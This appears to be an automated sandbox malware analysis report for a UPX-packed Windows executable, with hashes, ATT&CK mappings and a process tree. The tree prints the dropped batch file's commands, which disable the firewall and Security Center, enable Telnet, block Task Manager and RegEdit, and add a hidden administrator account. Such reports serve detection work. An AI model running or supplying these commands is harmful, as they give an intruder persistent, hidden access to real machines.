4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46d

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/01/2025, 09:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe
Size

20KB
MD5

753d99248cd46572938a6700ba2d6550
SHA1

453edba4c9d47ddeb28b83f05231fa9554e61c60
SHA256

4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46d
SHA512

9cc5419ded48d41812b044aa6b2afc215b5eb4d42f2372fc06f671c183a04399e137bfae924fb3b0c01f10205b593ecfe26b34063581fb1b52268682d32083c3
SSDEEP

384:xScEHK2HaSvfKzxWQ7U+UqzykEX/RAjnP/nvdOsy1kwOw:Qc4PH3yzJ7U+UqS+DVOIwO

Score

10^/10

discovery evasion execution persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 8 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2608	netsh.exe
2528	netsh.exe
2340	netsh.exe
2740	netsh.exe
2812	netsh.exe
2988	netsh.exe
2604	netsh.exe
2760	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2680-1-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/2680-16-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2656	sc.exe
3064	sc.exe
1860	sc.exe
676	sc.exe
1484	sc.exe
2796	sc.exe
2624	sc.exe
2720	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2076	reg.exe
2216	reg.exe

Runs net.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2680 wrote to memory of 2964	2680	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	30
PID 2680 wrote to memory of 2964	2680	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	30
PID 2680 wrote to memory of 2964	2680	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	30
PID 2680 wrote to memory of 2964	2680	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	30
PID 2964 wrote to memory of 2528	2964	cmd.exe	32
PID 2964 wrote to memory of 2528	2964	cmd.exe	32
PID 2964 wrote to memory of 2528	2964	cmd.exe	32
PID 2964 wrote to memory of 2528	2964	cmd.exe	32
PID 2964 wrote to memory of 2340	2964	cmd.exe	33
PID 2964 wrote to memory of 2340	2964	cmd.exe	33
PID 2964 wrote to memory of 2340	2964	cmd.exe	33
PID 2964 wrote to memory of 2340	2964	cmd.exe	33
PID 2964 wrote to memory of 2740	2964	cmd.exe	34
PID 2964 wrote to memory of 2740	2964	cmd.exe	34
PID 2964 wrote to memory of 2740	2964	cmd.exe	34
PID 2964 wrote to memory of 2740	2964	cmd.exe	34
PID 2964 wrote to memory of 2812	2964	cmd.exe	35
PID 2964 wrote to memory of 2812	2964	cmd.exe	35
PID 2964 wrote to memory of 2812	2964	cmd.exe	35
PID 2964 wrote to memory of 2812	2964	cmd.exe	35
PID 2964 wrote to memory of 2988	2964	cmd.exe	36
PID 2964 wrote to memory of 2988	2964	cmd.exe	36
PID 2964 wrote to memory of 2988	2964	cmd.exe	36
PID 2964 wrote to memory of 2988	2964	cmd.exe	36
PID 2964 wrote to memory of 2604	2964	cmd.exe	37
PID 2964 wrote to memory of 2604	2964	cmd.exe	37
PID 2964 wrote to memory of 2604	2964	cmd.exe	37
PID 2964 wrote to memory of 2604	2964	cmd.exe	37
PID 2964 wrote to memory of 2760	2964	cmd.exe	38
PID 2964 wrote to memory of 2760	2964	cmd.exe	38
PID 2964 wrote to memory of 2760	2964	cmd.exe	38
PID 2964 wrote to memory of 2760	2964	cmd.exe	38
PID 2964 wrote to memory of 2796	2964	cmd.exe	39
PID 2964 wrote to memory of 2796	2964	cmd.exe	39
PID 2964 wrote to memory of 2796	2964	cmd.exe	39
PID 2964 wrote to memory of 2796	2964	cmd.exe	39
PID 2964 wrote to memory of 2624	2964	cmd.exe	40
PID 2964 wrote to memory of 2624	2964	cmd.exe	40
PID 2964 wrote to memory of 2624	2964	cmd.exe	40
PID 2964 wrote to memory of 2624	2964	cmd.exe	40
PID 2964 wrote to memory of 2608	2964	cmd.exe	41
PID 2964 wrote to memory of 2608	2964	cmd.exe	41
PID 2964 wrote to memory of 2608	2964	cmd.exe	41
PID 2964 wrote to memory of 2608	2964	cmd.exe	41
PID 2964 wrote to memory of 2720	2964	cmd.exe	42
PID 2964 wrote to memory of 2720	2964	cmd.exe	42
PID 2964 wrote to memory of 2720	2964	cmd.exe	42
PID 2964 wrote to memory of 2720	2964	cmd.exe	42
PID 2964 wrote to memory of 2656	2964	cmd.exe	43
PID 2964 wrote to memory of 2656	2964	cmd.exe	43
PID 2964 wrote to memory of 2656	2964	cmd.exe	43
PID 2964 wrote to memory of 2656	2964	cmd.exe	43
PID 2964 wrote to memory of 3064	2964	cmd.exe	44
PID 2964 wrote to memory of 3064	2964	cmd.exe	44
PID 2964 wrote to memory of 3064	2964	cmd.exe	44
PID 2964 wrote to memory of 3064	2964	cmd.exe	44
PID 2964 wrote to memory of 1860	2964	cmd.exe	45
PID 2964 wrote to memory of 1860	2964	cmd.exe	45
PID 2964 wrote to memory of 1860	2964	cmd.exe	45
PID 2964 wrote to memory of 1860	2964	cmd.exe	45
PID 2964 wrote to memory of 2076	2964	cmd.exe	46
PID 2964 wrote to memory of 2076	2964	cmd.exe	46
PID 2964 wrote to memory of 2076	2964	cmd.exe	46
PID 2964 wrote to memory of 2076	2964	cmd.exe	46

C:\Users\Admin\AppData\Local\Temp\4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe
"C:\Users\Admin\AppData\Local\Temp\4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BECD.tmp\trj.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\telnet.exe telnet ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2528
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\tftp.exe tftp ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2340
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\ftp.exe ftp ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2740
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\net.exe net ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2812
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening ALL 23 tel
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2988
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening ALL 21 ftp
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2604
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening ALL 713 fyg
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2760
- - C:\Windows\SysWOW64\sc.exe
    sc config wscsvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2796
- - C:\Windows\SysWOW64\sc.exe
    sc stop wscsvc
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2624
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2608
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2720
- - C:\Windows\SysWOW64\sc.exe
    sc stop SharedAccess
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2656
- - C:\Windows\SysWOW64\sc.exe
    sc config Messenger start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3064
- - C:\Windows\SysWOW64\sc.exe
    sc start Messenger
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1860
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2076
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2216
- - C:\Windows\SysWOW64\sc.exe
    sc config TlntSvr start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:676
- - C:\Windows\SysWOW64\sc.exe
    sc start TlntSvr
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1484
- - C:\Windows\SysWOW64\net.exe
    net user fygga passwords /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:704
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user fygga passwords /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:628
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators fygga /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2388
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators fygga /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2360
- - C:\Windows\SysWOW64\reg.exe
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fygga /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BECD.tmp\trj.bat

Filesize
1KB

MD5
b03f305099217bdb5ce57711da17d81a

SHA1
7561ebbf9f1f4e64534c229f54cbb76724b31ebe

SHA256
f189169de486517acdd601ba111b50c315abe374b03ba2cfce01d7d505e78b2e

SHA512
b90ca42653f9b0189a7d5bea3c698f5ee9ebd3952215453676507aae85c5d3a04c439325ff318f03a066e8447d0bb3b616312da6415efe58b68a0b401e881efc

Download Submit
memory/2680-1-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2680-16-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads